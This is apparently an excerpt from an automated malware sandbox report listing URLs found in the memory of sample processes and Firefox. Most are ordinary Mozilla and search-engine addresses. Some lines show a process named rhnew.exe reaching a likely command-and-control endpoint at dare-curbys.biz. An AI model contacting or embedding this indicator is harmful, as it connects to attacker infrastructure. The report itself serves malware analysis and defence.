                          Source: firefox.exe, 0000002F.00000002.3689565654.000001F94B4CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3437343071.000001F93286B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
                          Source: firefox.exe, 0000002F.00000002.3779966490.00001BE444004000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmpString found in binary or memory: https://baidu.com
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://basket.mozilla.org/news/subscribe/
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://basket.mozilla.org/news/subscribe_sms/
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://basket.mozilla.org/subscribe.json
                          Source: file.exe, 00000000.00000002.2756268933.0000000023A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2729388458.0000000001639000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3339866585.0000000005B32000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3339767750.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC7E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3442280011.000001F93E0AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                          Source: file.exe, 00000000.00000002.2756268933.0000000023A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2729388458.0000000001639000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3339866585.0000000005B32000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3339767750.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC7E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3442280011.000001F93E0AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                          Source: firefox.exe, 0000002F.00000002.3551249065.000001F944A64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3551249065.000001F944A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180browser.engagement.bookmarks_toolbar_bookmark_ad
                          Source: firefox.exe, 0000002F.00000002.3652668486.000001F94AFF9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
                          Source: firefox.exe, 0000002F.00000002.3652668486.000001F94AFF9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
                          Source: firefox.exe, 0000002F.00000002.3652668486.000001F94AFF9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
                          Source: firefox.exe, 0000002F.00000002.3652668486.000001F94AFF9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
                          Source: file.exe, 00000000.00000003.2350384892.0000000001637000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247410102.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247315256.0000000005B70000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247532490.0000000005B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: file.exe, 00000000.00000003.2350384892.0000000001637000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247410102.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247315256.0000000005B70000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247532490.0000000005B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: file.exe, 00000000.00000003.2350384892.0000000001637000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247410102.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247315256.0000000005B70000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247532490.0000000005B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: firefox.exe, 0000002F.00000002.3466728259.000001F943826000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3363111385.000001F942931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://completion.amazon.com/search/complete?q=
                          Source: firefox.exe, 0000002F.00000002.3462736194.000001F9435BB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3456920971.000001F942B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content-signature-2.cdn.mozilla.net
                          Source: firefox.exe, 0000002F.00000002.3462736194.000001F9435BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content-signature-2.cdn.mozilla.net/
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3578317189.000001F944FE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
                          Source: file.exe, 00000000.00000002.2756268933.0000000023A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2729388458.0000000001639000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3339866585.0000000005B32000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3339767750.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC7E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3442280011.000001F93E0AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                          Source: file.exe, 00000000.00000002.2756268933.0000000023A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2729388458.0000000001639000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3339866585.0000000005B32000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3339767750.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC7E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3442280011.000001F93E0AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                          Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B0D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile.services.mozilla.com
                          Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B0D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile.services.mozilla.com/
                          Source: firefox.exe, 0000002F.00000002.3466017028.000001F943734000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3664339405.000001F94B031000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3443955333.000001F93EAB0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://contile.services.mozilla.com/v1/tiles
                          Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B0D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile.services.mozilla.comNbl
                          Source: firefox.exe, 0000002F.00000002.3437343071.000001F932830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3437343071.000001F932811000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
                          Source: rhnew.exe, 00000019.00000003.2971168709.0000000001395000.00000004.00000020.00020000.00000000.sdmp, rhnew.exe, 00000019.00000003.2971598863.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dare-curbys.biz/
                          Source: rhnew.exe, 00000019.00000002.2972914286.000000000132F000.00000004.00000020.00020000.00000000.sdmp, rhnew.exe, 00000019.00000003.2971218158.000000000132F000.00000004.00000020.00020000.00000000.sdmp, rhnew.exe, 00000019.00000003.2971598863.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dare-curbys.biz/api
                          Source: rhnew.exe, 00000019.00000002.2973072927.000000000139A000.00000004.00000020.00020000.00000000.sdmp, rhnew.exe, 00000019.00000003.2971168709.0000000001395000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dare-curbys.biz/api((9
                          Source: firefox.exe, 0000002F.00000002.3551249065.000001F944A03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
                          Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B043000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc
                          Source: firefox.exe, 0000002F.00000002.3460822132.000001F943280000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
                          Source: firefox.exe, 0000002F.00000002.3551249065.000001F944A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3664339405.000001F94B04C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
                          Source: firefox.exe, 0000002F.00000002.3460822132.000001F943280000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
                          Source: firefox.exe, 0000002F.00000002.3460822132.000001F943280000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
                          Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B049000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureWebExtensionUncheckedLastErr
                          Source: firefox.exe, 0000002F.00000002.3551249065.000001F944A03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
                          Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B04C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureElementReleaseCaptureWarningElem
                          Source: firefox.exe, 0000002F.00000002.3460822132.000001F943280000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
                          Source: firefox.exe, 0000002F.00000002.3551249065.000001F944A03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
                          Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B049000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#EncryptionPreventDefaultFromP
                          Source: firefox.exe, 0000002F.00000002.3460822132.000001F943280000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
                          Source: firefox.exe, 0000002F.00000002.3551249065.000001F944A03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
                          Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnored
                          Source: firefox.exe, 0000002F.00000002.3460822132.000001F943280000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3779966490.00001BE444004000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com
                          Source: firefox.exe, 0000002F.00000002.3466728259.000001F943826000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3740271771.000008F722804000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3363111385.000001F942931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/
                          Source: firefox.exe, 0000002F.00000002.3760375687.000016C370E00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?Z
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?t=ffab&q=
                          Source: file.exe, 00000000.00000003.2350384892.0000000001637000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247410102.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247315256.0000000005B70000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247532490.0000000005B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: file.exe, 00000000.00000003.2350384892.0000000001637000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247410102.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247315256.0000000005B70000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247532490.0000000005B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: file.exe, 00000000.00000003.2350384892.0000000001637000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247410102.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247315256.0000000005B70000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247532490.0000000005B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: firefox.exe, 0000002F.00000002.3451619202.000001F942070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/y
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmpString found in binary or memory: https://ebay.com
                          Source: firefox.exe, 0000002F.00000002.3779966490.00001BE444004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ebay.comP
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940981000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%sresource://gre/modules/handlers/HandlerList.sys.mj
                          Source: firefox.exe, 0000002F.00000002.3551249065.000001F944A03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
                          Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B049000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/SelectOptionsLengthAssignmentW
                          Source: firefox.exe, 0000002F.00000002.3460822132.000001F943280000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://fb.me/react-polyfillsO
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://fb.me/react-polyfillsP
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://fb.me/react-polyfillsPO
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3652668486.000001F94AF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3584635396.000001F945E60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3418749970.000001F943BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3418749970.000001F943BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/d8e772fe-4909-4f05-9f9
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://firefox-source-docs.mozilla.org/browser/components/newtab/content-src/asrouter/docs/debuggin
                          Source: firefox.exe, 0000002F.00000002.3551249065.000001F944A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3460340686.000001F943250000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsSELEC
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmpString found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsm
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmpString found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsmr
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/nimbus-desktop-experiments
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordsi
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1i
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1i#
                          Source: firefox.exe, 0000002F.00000002.3447477708.000001F93FC4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fpn.firefox.com
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3652668486.000001F94AF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3584635396.000001F945E60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3652668486.000001F94AF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3615821219.000001F9461C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3664339405.000001F94B0AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3652668486.000001F94AF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3615821219.000001F9461C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3615821219.000001F9461EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://getpocket.com/
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://getpocket.com/a4
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://getpocket.com/collections
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://getpocket.com/explore/
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
